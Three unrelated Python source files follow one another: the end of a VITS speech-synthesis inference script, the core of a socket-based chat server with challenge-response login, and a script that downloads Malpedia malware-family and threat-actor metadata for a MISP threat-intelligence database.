        phonemes_path = args.model_dir / "phonemes.txt"
        _LOGGER.debug("Loading configuration(s) from %s", phonemes_path)
        with open(phonemes_path, "r", encoding="utf-8") as phonemes_file:
            for line in phonemes_file:
                line = line.strip("\r\n")
                if (not line) or line.startswith("#"):
                    continue

                phoneme_id, phoneme = re.split(r"[ \t]", line, maxsplit=1)

                # Avoid overwriting duplicates
                if phoneme not in phoneme_to_id:
                    phoneme_id = int(phoneme_id)
                    phoneme_to_id[phoneme] = phoneme_id

                # Need to count separately because phonemes may be duplicated
                num_phonemes += 1

        assert (
            num_phonemes == config.model.num_symbols
        ), f"Model has {config.model.num_symbols}, but phonemes.txt has {num_phonemes}"

    # Load checkpoint
    start_time = time.perf_counter()

    # Checkpoint
    if args.checkpoint:
        checkpoint_path = Path(args.checkpoint)
    else:
        checkpoint_path = args.model_dir / "best_model.pth"

    _LOGGER.debug("Loading checkpoint from %s", checkpoint_path)
    # NOTE: "load_discrimiator" matches the (misspelled) keyword in
    # vits_train.checkpoint.load_checkpoint; do not "fix" it here alone.
    model = load_checkpoint(
        str(checkpoint_path),
        config=config,
        load_discrimiator=False,
        load_optimizers=False,
        load_schedulers=False,
        use_cuda=args.cuda,
    ).model_g
    end_time = time.perf_counter()

    _LOGGER.info(
        "Loaded checkpoint from %s in %s second(s)",
        checkpoint_path,
        end_time - start_time,
    )

    if args.cuda:
        model.cuda()

    model.eval()

    # Multispeaker: default to speaker 0 when none was given.
    if config.model.n_speakers > 1:
        if args.speaker is None:
            args.speaker = 0

    # -------------------------------------------------------------------------

    if os.isatty(sys.stdin.fileno()):
        print("Reading whitespace-separated phoneme ids from stdin...", file=sys.stderr)

    # Read phoneme ids from standard input.
    # Phoneme ids are separated by whitespace (<p1> <p2> ...)
    try:
        for line in sys.stdin:
            line = line.strip()
            if not line:
                continue

            utt_id = "output"
            speaker_num = args.speaker
            if args.csv:
                # Input format is id | p1 p2 p3...
                # (optional middle field: speaker number)
                line_parts = line.split("|", maxsplit=3)
                utt_id = line_parts[0]
                line = line_parts[-1]
                if (len(line_parts) > 2) and (config.model.n_speakers > 1):
                    speaker_num = int(line_parts[1])

            if args.text:
                # Map phonemes to ids (unknown phonemes are silently dropped)
                assert phoneme_to_id, "No phonemes were loaded"
                phoneme_ids = [phoneme_to_id[p] for p in line if p in phoneme_to_id]
                # phoneme_ids = intersperse(phoneme_ids, 0)
            else:
                # Phoneme ids as p1 p2 p3...
                phoneme_ids = [int(p) for p in line.split()]

            _LOGGER.debug("%s (id=%s)", phoneme_ids, utt_id)

            with torch.no_grad():
                text = torch.LongTensor(phoneme_ids).unsqueeze(0)
                text_lengths = torch.LongTensor([text.shape[1]])
                speaker_id = None
                if config.model.n_speakers > 1:
                    speaker_id = torch.LongTensor([speaker_num])

                if args.cuda:
                    # Bug fix: Tensor.cuda() is out-of-place -- the original
                    # discarded its result, so the inputs never actually
                    # moved to the GPU.
                    text = text.contiguous().cuda()
                    text_lengths = text_lengths.contiguous().cuda()
                    if speaker_id is not None:
                        speaker_id = speaker_id.cuda()

                _LOGGER.debug(
                    "Inferring audio for %s symbols (speaker=%s)",
                    text.shape[1],
                    speaker_id,
                )
                start_time = time.perf_counter()
                audio = (
                    model.infer(
                        text,
                        text_lengths,
                        sid=speaker_id,
                        noise_scale=args.noise_scale,
                        noise_scale_w=args.noise_scale_w,
                        length_scale=args.length_scale,
                    )[0][0, 0]
                    .data.cpu()
                    .float()
                    .numpy()
                )
                audio = audio_float_to_int16(audio)
                end_time = time.perf_counter()

                _LOGGER.debug(
                    "Generated audio in %s second(s) (%s, shape=%s)",
                    end_time - start_time,
                    utt_id,
                    list(audio.shape),
                )

                output_file_name = utt_id
                if not output_file_name.endswith(".wav"):
                    output_file_name += ".wav"

                output_path = args.output_dir / output_file_name
                output_path.parent.mkdir(parents=True, exist_ok=True)

                write_wav(str(output_path), config.audio.sample_rate, audio)

                _LOGGER.info("Wrote WAV to %s", output_path)
    except KeyboardInterrupt:
        pass
# -----------------------------------------------------------------------------
# Run the CLI only when executed as a script (not when imported).
if __name__ == "__main__":
    main()
|
# Source: DmitryTakmakov/Takmachat - server/server/server/core.py
"""
All the main functions for the server app
"""
from binascii import hexlify, a2b_base64
from hmac import new, compare_digest
from json import JSONDecodeError
from logging import getLogger
from os import urandom
from select import select
from socket import socket, AF_INET, SOCK_STREAM
from threading import Thread
from utils.constants import MAX_NUMBER_OF_CONNECTIONS, ACTION, \
PRESENCE, TIME, USER, MESSAGE, SENDER, DESTINATION, \
MESSAGE_TEXT, RESPONSE, ERROR, EXIT, ACCOUNT_NAME, GET_CONTACTS, \
LIST_INFO, ADD_CONTACT, REMOVE_CONTACT, USER_REQUEST, \
PUBLIC_KEY_REQUEST, DATA, PUBLIC_KEY
from utils.descriptors import Port
from utils.utils import receive_message, send_message
SERVER_LOGGER = getLogger('server')
class MessagingServer(Thread):
    """
    The main class of the server.

    Runs in its own thread: accepts client connections, authenticates
    users against the database, and relays JSON messages between clients.
    """
    # Descriptor that validates the port value on assignment.
    port = Port()

    def __init__(self,
                 listening_address: str,
                 listening_port: int,
                 db):
        """
        Server initialization.
        Creates the attributes needed for the server to work,
        sets the working flag as True.
        :param listening_address: server's IP address
        :param listening_port: server's port
        :param db: server's database
        """
        self.listening_address = listening_address
        self.listening_port = listening_port
        self.server_db = db
        self.server_socket = None
        # All connected sockets (authorized or not).
        self.clients_list = []
        # Writable sockets from the last select() call.
        self.sockets_list = None
        self.exceptions_list = None
        self.messages_queue = list()
        # Maps account name -> client socket for authorized clients.
        self.nicknames = dict()
        self.working = True
        super().__init__()

    def run(self):
        """
        The main loop of the server.
        Creates a listening socket, and then accepts connections while the working flag is True.
        If there are clients with messages, sends them.
        """
        self.server_socket = socket(AF_INET, SOCK_STREAM)
        self.server_socket.bind(
            (self.listening_address, self.listening_port)
        )
        # Short timeout so accept() does not block the loop forever.
        self.server_socket.settimeout(0.5)
        self.server_socket.listen(MAX_NUMBER_OF_CONNECTIONS)
        try:
            while self.working:
                try:
                    client_socket, client = self.server_socket.accept()
                    addr, port = client
                except OSError:
                    # accept() timed out -- just poll the client sockets below.
                    pass
                else:
                    SERVER_LOGGER.info(
                        'Установлено соединение с пользователем: '
                        'адрес: %s, порт: %s.' % (addr, port,)
                    )
                    client_socket.settimeout(5)
                    self.clients_list.append(client_socket)
                ready_to_receive = []
                ready_to_send = []
                exceptions_list = []
                try:
                    if self.clients_list:
                        # NOTE(review): despite its name, ready_to_send receives
                        # the *readable* sockets (first element of select()'s
                        # result); the writable list goes to self.sockets_list.
                        ready_to_send, self.sockets_list, self.exceptions_list = select(
                            self.clients_list,
                            self.clients_list,
                            [],
                            0
                        )
                except OSError as err:
                    SERVER_LOGGER.error(
                        'Ошибка работы с сокетами: %s.' % err
                    )
                if ready_to_send:
                    # Process one incoming message per readable socket.
                    for client in ready_to_send:
                        try:
                            self.process_client_message(
                                receive_message(client),
                                client
                            )
                        except (OSError,
                                JSONDecodeError,
                                TypeError) as e:
                            SERVER_LOGGER.error(
                                'Ошибка при запросе '
                                'информации от клиента.',
                                exc_info=e
                            )
                            self.delete_client(client)
        except KeyboardInterrupt:
            SERVER_LOGGER.info('Серер остановлен пользователем.')
            self.server_socket.close()

    def process_client_message(self, message: dict, client: socket):
        """
        Handles the messages from clients according to their service codes.
        This method handles authorization, client's exit, contact list, existing users'
        and public key requests, requests to add or delete a contact and messages from
        client to client (this method also records these messages to server DB). This method
        triggers a relevant handler if needed, or tries to send a response with a relevant
        service code (200, 202, 511 or 400 in case of bad request). If sending a message
        was not possible, this method deletes the user from the list of active users.
        :param message: dictionary with a message
        :param client: client's socket
        """
        SERVER_LOGGER.debug(
            'Обработка входящего сообщения: %s.' % message
        )
        # client authorization
        if ACTION in message and message[ACTION] == PRESENCE \
                and TIME in message and USER in message:
            self.authorize_client(message, client)
        # client-to-client message
        elif ACTION in message and message[ACTION] == MESSAGE and \
                SENDER in message and DESTINATION in message and \
                TIME in message and MESSAGE_TEXT in message \
                and self.nicknames[message[SENDER]] == client:
            if message[DESTINATION] in self.nicknames:
                self.messages_queue.append(message)
                # Record sender/recipient pair in message history.
                self.server_db.record_message_to_history(
                    message[SENDER],
                    message[DESTINATION]
                )
                self.send_client_message(message)
                try:
                    send_message(client, {RESPONSE: 200})
                except OSError:
                    self.delete_client(client)
            else:
                response = {
                    RESPONSE: 400,
                    ERROR: 'Пользователь не зарегистрирован на сервере.'
                }
                try:
                    send_message(client, response)
                except OSError:
                    pass
            return
        # client exits
        elif ACTION in message and message[ACTION] == EXIT and \
                ACCOUNT_NAME in message:
            self.delete_client(client)
        # contact list request
        elif ACTION in message and message[ACTION] == GET_CONTACTS \
                and USER in message \
                and self.nicknames[message[USER]] == client:
            response = {
                RESPONSE: 202,
                LIST_INFO: self.server_db.get_user_contact_list(
                    message[USER])
            }
            try:
                send_message(client, response)
            except OSError:
                self.delete_client(client)
        # add-contact request
        elif ACTION in message and message[ACTION] == ADD_CONTACT \
                and ACCOUNT_NAME in message and USER in message \
                and self.nicknames[message[USER]] == client:
            self.server_db.add_contact_to_list(
                message[USER],
                message[ACCOUNT_NAME]
            )
            try:
                send_message(client, {RESPONSE: 200})
            except OSError:
                self.delete_client(client)
        # remove-contact request
        elif ACTION in message and message[ACTION] == REMOVE_CONTACT \
                and ACCOUNT_NAME in message and USER in message \
                and self.nicknames[message[USER]] == client:
            self.server_db.remove_contact_from_list(
                message[USER],
                message[ACCOUNT_NAME]
            )
            try:
                send_message(client, {RESPONSE: 200})
            except OSError:
                self.delete_client(client)
        # known-users list request
        elif ACTION in message and message[ACTION] == USER_REQUEST \
                and ACCOUNT_NAME in message \
                and self.nicknames[message[ACCOUNT_NAME]] == client:
            response = {
                RESPONSE: 202,
                LIST_INFO: [
                    user[0] for user in self.server_db.all_users_list()
                ]
            }
            try:
                send_message(client, response)
            except OSError:
                self.delete_client(client)
        # public-key request for another client
        elif ACTION in message and message[ACTION] == \
                PUBLIC_KEY_REQUEST and ACCOUNT_NAME in message:
            response = {
                RESPONSE: 511,
                DATA: self.server_db.get_user_public_key(
                    message[ACCOUNT_NAME])
            }
            if response[DATA]:
                try:
                    send_message(client, response)
                except OSError:
                    self.delete_client(client)
            else:
                response = {
                    RESPONSE: 400,
                    ERROR: 'Отсутствует публичный ключ пользователя.'
                }
                try:
                    send_message(client, response)
                except OSError:
                    self.delete_client(client)
        # anything else: bad request
        else:
            response = {
                RESPONSE: 400,
                ERROR: 'bad request'
            }
            try:
                send_message(client, response)
            except OSError:
                self.delete_client(client)

    def authorize_client(self, message: dict, client: socket):
        """
        Handles the client's authorization. Checks if the username isn't already taken,
        then checks if the user is registered on the server. If those two checks pass,
        the method then initiates the exchange of encrypted passwords with the client.
        If the password is correct, the client is logged onto the server, otherwise the
        client is removed from the server and his socket gets closed.
        :param message: presence message
        :param client: client's socket
        """
        SERVER_LOGGER.debug(
            'Старт процесса авторизации пользователя %s' %
            message[USER]
        )
        if message[USER][ACCOUNT_NAME] in self.nicknames.keys():
            # Username is already in use by an active client.
            response = {
                RESPONSE: 400,
                ERROR: 'Имя пользователя уже занято'
            }
            try:
                send_message(client, response)
            except OSError as e:
                SERVER_LOGGER.debug('Произошла ошибка: %s' % e)
                pass
            self.clients_list.remove(client)
            client.close()
        elif not self.server_db.check_existing_user(
                message[USER][ACCOUNT_NAME]):
            # User is not registered in the database.
            response = {
                RESPONSE: 400,
                ERROR: 'Пользователь не зарегистрирован'
            }
            try:
                SERVER_LOGGER.debug(
                    'Пользователь %s не зарегистрирован' %
                    message[USER][ACCOUNT_NAME]
                )
                send_message(client, response)
            except OSError as e:
                SERVER_LOGGER.debug('Произошла ошибка: %s' % e)
                pass
        else:
            SERVER_LOGGER.debug('Начало проверки пароля')
            # Challenge-response: send a random string, expect it back
            # HMAC'ed with the stored password hash.
            random_string = hexlify(urandom(64))
            auth_response = {
                RESPONSE: 511,
                DATA: random_string.decode('ascii')
            }
            pwd_hash = new(
                self.server_db.get_user_pwd_hash(
                    message[USER][ACCOUNT_NAME]),
                random_string,
                'MD5'
            )
            pwd_digest = pwd_hash.digest()
            SERVER_LOGGER.debug(
                'Подготовлено сообщение для авторизации: %s' %
                auth_response
            )
            try:
                send_message(client, auth_response)
                client_response = receive_message(client)
            except OSError as e:
                SERVER_LOGGER.debug(
                    'Ошибка при авторизации: ', exc_info=e
                )
                client.close()
                return
            client_digest = a2b_base64(client_response[DATA])
            # compare_digest: constant-time comparison of the two HMACs.
            if RESPONSE in client_response and \
                    client_response[RESPONSE] == 511 and \
                    compare_digest(pwd_digest, client_digest):
                self.nicknames[message[USER][ACCOUNT_NAME]] = client
                client_addr, client_port = client.getpeername()
                try:
                    send_message(client, {RESPONSE: 200})
                except OSError:
                    self.delete_client(client)
                # Record the login (address, port, public key) in the DB.
                self.server_db.login_user(
                    message[USER][ACCOUNT_NAME],
                    client_addr,
                    client_port,
                    message[USER][PUBLIC_KEY]
                )
            else:
                response = {
                    RESPONSE: 400,
                    ERROR: 'Неверный пароль'
                }
                try:
                    send_message(client, response)
                except OSError:
                    pass
                self.clients_list.remove(client)
                client.close()

    def send_client_message(self, message: dict):
        """
        Handles the exchange of messages between clients.
        Validates the message and sends it if correct
        :param message: dictionary with the message
        """
        if message[DESTINATION] in self.nicknames and \
                self.nicknames[message[DESTINATION]] in \
                self.sockets_list:
            # Recipient is connected and its socket is writable.
            send_message(self.nicknames[message[DESTINATION]],
                         message)
            SERVER_LOGGER.info(
                'Было отправлено сообщение пользователю '
                '%s от пользователя %s.' %
                (message[DESTINATION], message[SENDER])
            )
        elif message[DESTINATION] in self.nicknames and \
                self.nicknames[message[DESTINATION]] \
                not in self.sockets_list:
            # Recipient is known but its socket is no longer writable.
            SERVER_LOGGER.error(
                'Потеряна связь с клиентом %s, '
                'отправка сообщения не возможна.' %
                self.nicknames[message[DESTINATION]]
            )
            self.delete_client(self.nicknames[message[DESTINATION]])
        else:
            SERVER_LOGGER.error(
                'Пользователь %s не зарегистрирован на сервере, '
                'отправка сообщения не возможна.' %
                message[DESTINATION]
            )

    def delete_client(self, client: socket):
        """
        Closes the connection with the client who decided to leave the server.
        Logs him out in the DB, deletes from the list of active users and closes the socket.
        :param client: client's socket
        """
        SERVER_LOGGER.info(
            'Клиент %s отключился от сервера' % client)
        # Reverse-lookup the account name; break immediately since
        # mutating the dict during iteration is only safe for one entry.
        for name in self.nicknames:
            if self.nicknames[name] == client:
                self.server_db.logout_user(name)
                del self.nicknames[name]
                break
        self.clients_list.remove(client)
        client.close()

    def update_list(self):
        """
        Generates the message with 205 code that triggers the update of contact
        and active users' lists for all active clients.
        """
        for name in self.nicknames:
            try:
                send_message(self.nicknames[name], {RESPONSE: 205})
            except OSError:
                self.delete_client(self.nicknames[name])
|
from copy import Error
import pymisp as pm
from pymisp import api
import malpedia_client as mp_Client
import mitre_functions as mf
import sanitizitation_functions as sf
import globals as gv
import misp_event_functions as mef
import database_actions as db
import os
import sys
import json
import time
import math
import glob
import datetime
import uuid
import misp_galaxy_functions as mgf
# import git_actions
import yaml
# import threading
import concurrent.futures as cf
from globals import _EXECUTOR as executor
# AUTHENTICATE TO MALPEDIA
def Authenticate():
    """Create an authenticated Malpedia API client, aborting the program on failure."""
    try:
        return mp_Client.Client(apitoken=gv._MALPEDIA_KEY)
    except Exception as err:
        print("f(x) Authenticate Error: {}".format(err))
        sys.exit(err)
# CHECK IF IS A VALID DATE
def valid_date(datestring):
    """Return True when *datestring* parses as a %Y-%m-%d date, else False."""
    try:
        datetime.datetime.strptime(datestring, '%Y-%m-%d')
    except ValueError:
        return False
    return True
# FIX MALFORMED JSON
def fix_json(iJSON):
    """Normalize possibly-malformed JSON by round-tripping it through YAML.

    YAML is a superset of JSON, so safe_load tolerates minor deviations
    (unquoted keys, single quotes, trailing content) that json.loads rejects.

    :param iJSON: a JSON string or an open file-like object (yaml.safe_load
        accepts streams).
    :return: the re-serialized JSON string, or None (implicitly) on failure.
    """
    try:
        yamlData = yaml.safe_load(iJSON)
        jsonData = json.dumps(yamlData)
        return jsonData
    except Exception:
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
        # still propagate instead of being swallowed.
        exc_type, _, exc_tb = sys.exc_info()
        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
        print("f(x) fix_json: ERROR: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
# READ SPECIMEN DATA FROM JSON FILE
def getSpecimenData(iFamilyName, iSha256):
    """Look up a specimen's status and version in the family's cached JSON file.

    :param iFamilyName: malware family name (basename of the cached file).
    :param iSha256: specimen hash to search for.
    :return: (status, version, sha256); status/version stay "" when the hash
        is not found. NOTE(review): on a miss, sha256 holds the last hash
        examined rather than "" -- confirm callers rely only on status/version.
    """
    specimen_dict = {}
    status = ""
    version = ""
    sha256 = ""
    # fix_json() feeds the open file straight into yaml.safe_load, which
    # accepts streams. The with-block closes the file (removed the
    # redundant explicit close() inside it).
    with open(gv._MALPEDIA_OUTPUT + "malware/" + iFamilyName + ".json", 'r') as jsonIn:
        specimen_dict = json.loads(fix_json(jsonIn))
    for specimen in specimen_dict:
        sha256 = specimen["sha256"]
        if sha256 == iSha256:
            status = specimen["status"]
            version = specimen["version"]
            break
    return status, version, sha256
def stageMalwareSpecimens():
    """Download specimen lists for every malware family and cache them as JSON.

    Progress is tracked in 001.completed.maware.json so an interrupted run can
    resume without re-downloading. Requests are throttled to stay under the
    Malpedia per-minute API limit.
    """
    dirList = []
    for path in gv._DIR_MALPEDIA_GIT_LIST:
        listPath = path.split("/")
        if len(listPath) > (gv._FAMILY_SPLIT_DEPTH + 1):
            family = path.split("/")[gv._FAMILY_SPLIT_DEPTH]
            dirList.append(family)
    dirList.sort()
    gv._MALWARE_FAMILY_SET = set(dirList)
    try:
        # THROTTLE SO IT DOESN'T LOCK API KEY
        max_requests_per_minute = 40  # 60 requests per minute is the max
        current_request_count = 1
        completed_malware_list = []
        # MAKE THE COMPLETED FILE IF IT DOESN'T EXIST
        completed_malware_file_path = gv._MALPEDIA_OUTPUT + "malware/" + "001.completed.maware.json"
        if os.path.isfile(completed_malware_file_path):
            with open(completed_malware_file_path, 'r') as completed_malware_file:
                completed_malware_list = json.loads(fix_json(completed_malware_file.read()))
        else:
            # Bug fix: seed the file with an empty JSON *list* ([]). The old
            # json.dumps("[]") wrote the JSON string "\"[]\"", which loaded
            # back as a str and broke the later list membership/append.
            with open(completed_malware_file_path, 'w') as completed_malware_file:
                completed_malware_file.write(json.dumps([]))
        tStart = time.time()
        iWait = 140
        for malware in gv._MALWARE_FAMILY_SET:
            if malware in completed_malware_list:
                continue
            with open(gv._MALPEDIA_OUTPUT + "malware/" + malware + ".json", 'w') as jsonOut:
                print("f(x) stageMalwareSpecimens: PULLING DATA FOR MALWARE: {}".format(malware))
                mpClient = Authenticate()
                gv._CURRENT_FAMILY_CURRENT_SPECIMEN_DICT = mpClient.list_samples(malware)
                jsonOut.write(json.dumps(gv._CURRENT_FAMILY_CURRENT_SPECIMEN_DICT))
            # Bug fixes: (1) mark the family complete unconditionally --
            # previously a family fetched right before a throttle pause was
            # never recorded and got re-downloaded on the next run;
            # (2) close the progress file via the with-block -- the old
            # `completed_malware_file.close` (no parens) never closed it.
            completed_malware_list.append(malware)
            with open(completed_malware_file_path, 'w') as completed_malware_file:
                completed_malware_file.write(json.dumps(completed_malware_list))
            current_request_count += 1
            # DEBUG SEQ
            if gv._DEBUG:
                print("f(x) stageMalwareSpecimens: {}: ADDED TO COMPLETED MALWARE.".format(malware))
            # Throttle: once the per-window budget is spent, sleep out the
            # remainder of the window before resuming.
            tDiff = time.time() - tStart
            if (current_request_count > max_requests_per_minute) and (tDiff <= iWait):
                print("f(x) stageMalwareSpecimens: API PULL THRESHHOLD REACHED.")
                while tDiff <= iWait:
                    time.sleep(1)
                    tDiff = time.time() - tStart
                    print("f(x) stageMalwareSpecimens: WAITING {} SECONDS.".format(math.ceil(iWait - tDiff)))
                tStart = time.time()
                current_request_count = 1
                print("f(x) stageMalwareSpecimens: RESUMING PULLS")
        print("f(x) stageMalwareSpecimens: COMPLETED DOWNLOAD OF MALWARE SPECIMEN INFO")
    except Exception as e:
        exc_type, _, exc_tb = sys.exc_info()
        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
        print("f(x) stageMalwareSpecimens: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
        sys.exit(e)
def build_actor_malware_tree(threat_actor):
    """Parse one actor's downloaded Malpedia JSON and stage it in the database.

    Reads <gv._MALPEDIA_OUTPUT>/actors/<threat_actor>.json, copies its top-level
    and "meta" fields into the gv._CURRENT_ACTOR_* globals (each missing field
    falls back to "" / [] / {}), then inserts: the actor row, its name/synonym/
    country/victim/target tags, MITRE group and technique GALAXY tags, suspected
    victims, references, target categories, synonyms, and finally a root
    parent/child record of type ACTOR.

    :param threat_actor: Malpedia short name of the actor; used as the JSON file
        stem and inserted as the actor's short-name tag.

    Side effects: mutates many gv._CURRENT_ACTOR_* globals and writes to the
    database via ``db``; callers that read those globals afterwards see this
    actor's values.
    """
    print("f(x) build_actor_malware_tree: STAGING DATA FOR {}".format(threat_actor.upper()))
    lastupdated = datetime.date.today()
    path_to_json = gv._MALPEDIA_OUTPUT + "actors/" + threat_actor + ".json"
    # READ THE THREAT ACTOR JSON FILE
    # Reset per-actor MITRE caches so a previous actor's data cannot leak in.
    gv._CURRENT_ACTOR_MITRE_GROUP_CODE = "NONE"
    gv._CURRENT_ACTOR_MITRE_TECHNIQUE_IDS = []
    gv._CURRENT_ACTOR_TECHNIQUE_TAGS = []
    with open(path_to_json, 'r') as jsonIn:
        try:
            # NOTE(review): fix_json() is handed the open file object here,
            # while other call sites pass jsonIn.read() — confirm fix_json
            # accepts both input types.
            gv._CURRENT_ACTOR_INFO_DICT = json.loads(fix_json(jsonIn))
            jsonIn.close()
        except:
            exc_type, _, exc_tb = sys.exc_info()
            fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
            print("f(x) build_actor_malware_tree: BUILD THREAT ACTOR JSON FILE ERROR: {}: {}: {}".format(exc_type, fname, exc_tb.tb_lineno))
    #-----------------------------------------------------------------------------------------------------------------
    # TOP LEVEL VALUES------------------------------------------------------------------------------------------------
    #-----------------------------------------------------------------------------------------------------------------
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: TOP LEVEL")
        print("+" * 75)
    # STRING NAME OF ACTOR WITH FIRST CHARACTER CAPITALIZED
    try:
        gv._CURRENT_ACTOR_NAME_STR = gv._CURRENT_ACTOR_INFO_DICT["value"].strip()
    except:
        gv._CURRENT_ACTOR_NAME_STR = ""
    # DEBUG SEQ
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: ACTOR NAME: {}".format(gv._CURRENT_ACTOR_NAME_STR))
    # STRING OF ACTOR DESCRIPTION
    try:
        gv._CURRENT_ACTOR_DESCRIPTION_STR = gv._CURRENT_ACTOR_INFO_DICT["description"].strip()
    except:
        gv._CURRENT_ACTOR_DESCRIPTION_STR = ""
    # DEBUG SEQ
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: ACTOR DESCRIPTION: {}".format(gv._CURRENT_ACTOR_DESCRIPTION_STR))
    # STRING OF UUID
    try:
        gv._CURRENT_ACTOR_UUID_STR = gv._CURRENT_ACTOR_INFO_DICT["uuid"].strip()
        # Remember name -> uuid for later lookups.
        gv._ACTOR_UUID_DICT.update({gv._CURRENT_ACTOR_NAME_STR : gv._CURRENT_ACTOR_UUID_STR})
    except:
        gv._CURRENT_ACTOR_UUID_STR = ""
    # DEBUG SEQ
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: ACTOR UUID: {}".format(gv._CURRENT_ACTOR_UUID_STR))
        print("+" * 75)
    #-----------------------------------------------------------------------------------------------------------------
    # ACTOR META SECTION----------------------------------------------------------------------------------------------------
    #-----------------------------------------------------------------------------------------------------------------
    # GET META SECTION
    try:
        gv._CURRENT_ACTOR_META_DICT = gv._CURRENT_ACTOR_INFO_DICT["meta"]
    except:
        gv._CURRENT_ACTOR_META_DICT = {}
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: ACTOR META")
        print("+" * 75)
    # LIST OF STRINGS OF COUNTRY NAMES
    try:
        gv._CURRENT_ACTOR_META_CFR_SUSPECTED_VICTIMS_LIST = gv._CURRENT_ACTOR_META_DICT["cfr-suspected-victims"]
    except:
        gv._CURRENT_ACTOR_META_CFR_SUSPECTED_VICTIMS_LIST = []
    # DEBUG SEQ
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: ACTOR SUSPECTED VICTIMS")
        print(*gv._CURRENT_ACTOR_META_CFR_SUSPECTED_VICTIMS_LIST, sep = "\n")
    # STRING OF TWO DIGIT COUNTRY CODE
    try:
        gv._CURRENT_ACTOR_META_COUNTRY_STR = gv._CURRENT_ACTOR_META_DICT["country"].strip()
    except:
        gv._CURRENT_ACTOR_META_COUNTRY_STR = ""
    # DEBUG SEQ
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: ACTOR COUNTRY: {}".format(gv._CURRENT_ACTOR_META_COUNTRY_STR))
        # print("*" * 50)
    # LIST OF STRINGS OF LINKS TO ARTICLES
    try:
        gv._CURRENT_ACTOR_META_REFS_LIST = gv._CURRENT_ACTOR_META_DICT["refs"]
    except:
        gv._CURRENT_ACTOR_META_REFS_LIST = []
    # DEBUG SEQ
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: ACTOR REFERENCES")
        print(*gv._CURRENT_ACTOR_META_REFS_LIST, sep = "\n")
    # LIST OF STRINGS OF TYPE OF ACTOR
    try:
        gv._CURRENT_ACTOR_META_CFR_TARGET_CATEGORY_LIST = gv._CURRENT_ACTOR_META_DICT["cfr-target-category"]
    except:
        gv._CURRENT_ACTOR_META_CFR_TARGET_CATEGORY_LIST = []
    # DEBUG SEQ
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: TYPE OF ACTOR")
        print(*gv._CURRENT_ACTOR_META_CFR_TARGET_CATEGORY_LIST, sep = "\n")
    # STRING OF TYPE OF INCIDENT
    try:
        gv._CURRENT_ACTOR_META_CFR_TYPE_OF_INCIDENT_STR = gv._CURRENT_ACTOR_META_DICT["cfr-type-of-incident"].strip()
    except:
        gv._CURRENT_ACTOR_META_CFR_TYPE_OF_INCIDENT_STR = ""
    # DEBUG SEQ
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: ACTOR INCIDENT TYPE: {}".format(gv._CURRENT_ACTOR_META_CFR_TYPE_OF_INCIDENT_STR))
        # print("*" * 50)
    # LIST OF STRINGS OF SYNONYMS
    try:
        gv._CURRENT_ACTOR_META_SYNONYMS_LIST = gv._CURRENT_ACTOR_META_DICT["synonyms"]
    except:
        gv._CURRENT_ACTOR_META_SYNONYMS_LIST = []
    # DEBUG SEQ
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: ACTOR SYNONYMS")
        print(*gv._CURRENT_ACTOR_META_SYNONYMS_LIST, sep = "\n")
    # STRING OF STATE SPONSOR
    try:
        gv._CURRENT_ACTOR_META_CFR_STATE_SPONSOR_STR = gv._CURRENT_ACTOR_META_DICT["cfr-suspected-state-sponsor"].strip()
    except:
        gv._CURRENT_ACTOR_META_CFR_STATE_SPONSOR_STR = ""
    # DEBUG SEQ
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: ACTOR STATE SPONSOR: {}".format(gv._CURRENT_ACTOR_META_CFR_STATE_SPONSOR_STR))
        # print("*" * 50)
    # STRING OF VICTIMOLOGY
    try:
        gv._CURRENT_ACTOR_META_VICTIMOLOGY_STR = gv._CURRENT_ACTOR_META_DICT["victimology"].strip()
    except:
        gv._CURRENT_ACTOR_META_VICTIMOLOGY_STR = ""
    # DEBUG SEQ
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: ACTOR VICTIMOLOGY: {}".format(gv._CURRENT_ACTOR_META_VICTIMOLOGY_STR))
        # print("*" * 50)
    # STRING OF SINCE
    try:
        gv._CURRENT_ACTOR_META_SINCE_STR = gv._CURRENT_ACTOR_META_DICT["since"].strip()
    except:
        gv._CURRENT_ACTOR_META_SINCE_STR = ""
    # DEBUG SEQ
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: ACTOR SINCE: {}".format(gv._CURRENT_ACTOR_META_SINCE_STR))
        # print("*" * 50)
    # STRING OF MODE OF OPERATION
    try:
        gv._CURRENT_ACTOR_META_MODEOFOPERATIONS_STR = gv._CURRENT_ACTOR_META_DICT["mode-of-operation"].strip()
    except:
        gv._CURRENT_ACTOR_META_MODEOFOPERATIONS_STR = ""
    # DEBUG SEQ
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: ACTOR MODE OF OPERATION: {}".format(gv._CURRENT_ACTOR_META_MODEOFOPERATIONS_STR))
        # print("*" * 50)
    # STRING OF CAPABILITIES
    try:
        gv._CURRENT_ACTOR_META_CAPABILITIES_STR = gv._CURRENT_ACTOR_META_DICT["capabilities"].strip()
    except:
        gv._CURRENT_ACTOR_META_CAPABILITIES_STR = ""
    # DEBUG SEQ
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: ACTOR CAPABILITIES: {}".format(gv._CURRENT_ACTOR_META_CAPABILITIES_STR))
        # print("*" * 50)
    # ---------------------------------------------------------------------
    # BEGIN ACTOR META DATA DB INSERT
    # ---------------------------------------------------------------------
    # TAG FOR ACTOR
    # ---------------------------------------------------------------------
    # COMMON NAME
    if gv._DEBUG:
        print("f(x) build_actor_malware_tree: INSERT TAG: ACTOR: ACTOR COMMON NAME: {}".format(gv._CURRENT_ACTOR_NAME_STR))
